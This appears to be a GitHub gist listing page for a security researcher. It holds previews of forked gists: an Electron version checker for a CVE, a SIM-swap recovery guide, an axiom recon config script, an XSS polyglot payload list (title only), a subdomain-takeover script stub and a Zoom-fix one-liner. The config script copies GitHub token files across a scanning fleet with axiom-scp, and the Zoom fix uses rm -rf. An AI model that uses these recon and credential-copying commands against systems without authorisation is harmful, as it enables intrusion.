@w3llr00t3d
w3llr00t3d / find-all-electron-versions.sh
Created October 2, 2023 23:12 — forked from april/find-all-electron-versions.sh
find all apps using Electron and their versions, on macOS systems
#!/usr/bin/env zsh
# patched versions for CVE-2023-4863: 22.3.24, 24.8.3, 25.8.1, 26.2.1
mdfind "kind:app" 2>/dev/null | sort -u | while read app;
do
  filename="$app/Contents/Frameworks/Electron Framework.framework/Electron Framework"
  if [[ -f $filename ]]; then
    echo "App Name: $(basename ${app})"
    electronVersion=$(strings "$filename" | grep "Chrome/" | grep -i Electron | grep -v '%s' | sort -u | cut -f 3 -d '/')
w3llr00t3d / sim-swap.md
Created February 13, 2023 19:00 — forked from karllhughes/sim-swap.md
What to do if you get Sim-Swapped

Here's how this attack works: https://www.google.com/amp/s/www.zdnet.com/google-amp/article/how-i-survived-a-sim-swap-attack-and-how-my-carrier-failed-me/

Immediate actions

  • Make sure your primary email address has a secure recovery method and remove your old phone number from it.
    • Gmail lets you set "Backup codes" that you can print off to recover your account.
    • Change your email password and put it in a password manager.
    • Remove any link to the old phone number from your email.
  • If you're already locked out of your email, set up a "clean" email account. At this point, your old one is being accessed by hackers and can be used to reset any banking passwords.
  • Store this new email password in a password manager.
w3llr00t3d / axiom_config.sh
Created December 7, 2022 09:47 — forked from six2dez/axiom_config.sh
axiom_config.sh
#!/bin/bash
# Use this as initial axiom's script on reconftw.cfg file to copy config files to the fleet
axiom-exec 'mkdir -p /home/op/.config/amass/ /home/op/Tools/ /home/op/.config/subfinder/ /home/op/.config/notify/'
axiom-scp ~/.config/amass/config.ini '*':/home/op/.config/amass/config.ini
axiom-scp ~/Tools/h8mail_config.ini '*':/home/op/Tools/h8mail_config.ini
axiom-scp ~/Tools/.github_tokens '*':/home/op/Tools/.github_tokens
axiom-scp ~/.config/notify/notify.conf '*':/home/op/.config/notify/notify.conf
axiom-scp ~/Tools/.github_tokens '*':/home/op/Tools/.github_tokens
w3llr00t3d / test.svg
Last active April 19, 2022 01:37
test.svg

Keybase proof

I hereby claim:

  • I am wellr00t3d on github.
  • I am wellr00t3d (https://keybase.io/wellr00t3d) on keybase.
  • I have a public key ASDm-BJAFHLhryWdjcHLMcGnL2ZX-oMCToBKUVL5VAHCWQo

To claim this, I am signing this object:

w3llr00t3d / xss-polyglots.txt
Last active April 10, 2023 11:48 — forked from michenriksen/xss-polyglots.txt
XSS Polyglot payloads
w3llr00t3d / all.txt
Created October 5, 2019 05:14 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
w3llr00t3d / second-order.py
Created October 2, 2019 03:14 — forked from PatrikHudak/second-order.py
Second-order subdomain takeover
# coding=utf-8
# python3
from urllib.parse import urlparse
import requests
import urllib3
from bs4 import BeautifulSoup
w3llr00t3d / zoom_fix.md
Created July 10, 2019 16:02 — forked from karanlyons/ZoomDaemon.yara
Fix for Unexpected Zoom Behavior

If you're using macOS, run these commands:

pkill "ZoomOpener"; rm -rf ~/.zoomus; touch ~/.zoomus && chmod 000 ~/.zoomus;
pkill "RingCentralOpener"; rm -rf ~/.ringcentralopener; touch ~/.ringcentralopener && chmod 000 ~/.ringcentralopener;

These two commands do the same thing for the two most popular "brands" of Zoom (Zoom and RingCentral). They first kill the hidden server if it is running, and then, regardless, delete it from its hidden directory if it exists there. Finally they create an empty file